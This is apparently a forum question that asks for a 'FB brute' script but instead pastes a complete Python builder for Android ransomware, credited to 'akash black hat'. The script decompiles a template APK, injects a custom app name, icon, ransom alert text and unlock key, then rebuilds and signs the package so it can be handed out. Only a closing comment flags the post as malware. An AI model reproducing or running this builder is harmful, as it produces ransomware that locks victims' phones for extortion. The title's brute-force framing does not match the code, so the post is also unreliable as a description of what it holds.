# FB brute latest python script?

Tags: facebook

Can I get script? Huh

Code I want code can anyone provide . Can anyone assist me with it ? Huh ?

#This repository is best!

#-!- /usr/bin/akash/python3

#authoe: akash black hat

import os, sys, time, fileinput

from getpass import getpass

from PIL import Image

r = "\033[1;31m"

g = "\033[1;32m"

y = "\033[1;33m"

b = "\033[1;34m"

d = "\033[2;37m"

R = "\033[1;41m"

Y = "\033[1;43m"

B = "\033[1;44m"

w = "\033[0m"

app_icon = ""

app_name = ""

alert_title = ""

alert_desc = ""

key_pass = ""

def banner():

```
print('''\033[32m██████╗  █████╗ ███╗   ██╗███████╗ ██████╗ ███╗   ███╗
```

██╔══██╗██╔══██╗████╗  ██║██╔════╝██╔═══██╗████╗ ████║

██████╔╝███████║██╔██╗ ██║███████╗██║   ██║██╔████╔██║

██╔══██╗██╔══██║██║╚██╗██║╚════██║██║   ██║██║╚██╔╝██║

██║  ██║██║  ██║██║ ╚████║███████║╚██████╔╝██║ ╚═╝ ██║

╚═╝  ╚═╝╚═╝  ╚═╝╚═╝  ╚═══╝╚══════╝ ╚═════╝ ╚═╝     ╚═╝

██╗    ██╗ █████╗ ██████╗ ███████╗

██║    ██║██╔══██╗██╔══██╗██╔════╝

██║ █╗ ██║███████║██████╔╝█████╗

██║███╗██║██╔══██║██╔══██╗██╔══╝

╚███╔███╔╝██║  ██║██║  ██║███████╗

╚══╝╚══╝ ╚═╝  ╚═╝╚═╝  ╚═╝╚══════╝

\033[31mThe author is not responsible for any issues or damage

\033[32m***************\033[31Ransomware Android\033[32m******************

*Developer:AKASH BLACK HAT

******************************************************''')

def writefile(file,old,new):

```
while True:

    if os.path.isfile(file):

        replaces = {old:new}

        for line in fileinput.input(file, inplace=True):

            for search in replaces:

                replaced = replaces[search]

                line = line.replace(search,replaced)

            print(line, end="")

        break

    else: exit(r+"[!]"+w+" Failed to write in file "+file)
```

def start():

```
global app_icon, app_name, alert_title, alert_desc, key_pass

os.system("clear")

banner()

print(r+"[!]"+w+" Use this tool for education purpose only")

ask = str(input(r+"[!]"+w+" Do you agree (y/n): ").lower())

if ask in ("yes"): pass

else: exit(r+"[!]"+w+" Dont be evil !")

print(f"""

{r}Ransomwre{w} is a Simple Android Ransomware Attack

{w}The user can customize the App Icon, Name, Key and others.

{d}support us  !{w}

""")

print(b+"> "+w+os.popen("curl ifconfig.co/city --silent").readline().strip()+", "+os.popen("curl ifconfig.co/country --silent").readline().rstrip()+time.strftime(", %d/%m/%Y (%H.%M.%S)"))

print(b+">"+w+" Use \\n for newline and CTRL + C for exit")

print(w+"-"*43)

while True:

    x = str(input(w+"* SET app_icon (PNG only): "+g))

    if os.path.isfile(x):

        if ".png" in x:

            app_icon = x

            break

        else: print(r+"[!]"+w+" File not accepted, PNG format only !")

    else: print(r+"[!]"+w+" File not found, please fill correctly !")

while True:

    x = str(input(w+"* SET app_name: "+g))

    if len(x) != 0:

        app_name = x

        break

    else: continue

while True:

    x = str(input(w+"* SET title: "+g))

    if len(x) != 0:

        alert_title = x

        break

    else: continue

while True:

    x = str(input(w+"* SET description: "+g))

    if len(x) != 0:

        alert_desc = x

        break

    else: continue

while True:

    x = str(input(w+"* SET unlock key: "+g))

    if len(x) != 0:

        key_pass = x

        break

    else: continue

print(w+"* Building your ransomware APK's ...")

print(w+"-"*43+d)

os.system("apktool d Ransomwre.apk")

imgpath = [

    "Ransomwre/res/drawable-mdpi-v4/ic_launcher.png",

    "Ransomwre/res/drawable-xhdpi-v4/ic_launcher.png",

    "Ransomwre/res/drawable-hdpi-v4/ic_launcher.png",

    "Ransomwre/res/drawable-xxhdpi-v4/ic_launcher.png",

]

strings = "Ransomwre/res/values/strings.xml"

print("I: Using strings "+strings)

smali = os.popen(f"find -L Ransomwre/ -name '*0000.smali'","r").readline().strip()

print("I: Using smali "+os.path.basename(smali))

writefile(strings,"appname",app_name)

print("I: Adding name with "+app_name)

writefile(strings,"alert_title",alert_title)

print("I: Adding title with "+alert_title)

writefile(strings,"alert_desc",alert_desc)

print("I: Adding description with "+str(len(alert_desc))+" words")

writefile(smali,"key_pass",key_pass)

print("I: Adding unlock key with "+key_pass)

time.sleep(3)

for path in imgpath:

    if os.path.isfile(path):

        with Image.open(path) as target:

            width, height = target.size

            size = str(width)+"x"+str(height)

            logo = os.path.basename(app_icon)

            os.system("cp -R "+app_icon+" "+logo)

            os.system("mogrify -resize "+size+" "+logo+";cp -R "+logo+" "+path)

            os.system("rm -rf "+logo)

            print("I: Adding icon with "+os.path.basename(app_icon)+" size: "+size)

    else: exit(1)

os.system("apktool b Ransomwre -o final.apk;rm -rf Ransomwre")

os.system("java -jar ubersigner.jar -a final.apk --ks debug.jks --ksAlias debugging --ksPass debugging --ksKeyPass debugging > /dev/null 2>&1")

os.system("java -jar ubersigner.jar -a final.apk --onlyVerify > /dev/null 2>&1")

os.system("rm -rf final.apk")

if os.path.isfile("final-aligned-signed.apk"):

    out = app_name.replace(" ","").lower() + ".apk"

    os.system("mv final-aligned-signed.apk "+out)

    getpass(b+">"+w+" Result saved as: "+B+" "+out+" "+w)

else: print(r+"[!]"+w+" Failed to signed APK's")
```

if **name** == "**main**":

```
try:

    start()

except KeyboardInterrupt:

    exit(r+"\n[!]"+w+" Thanks for Using this tools\n    Join Us All \https://youtube.com/@CyberBot817    exiting ...")
```

Comment: I’m voting to close this question because it appears to be asking about scripts for hacking/malware.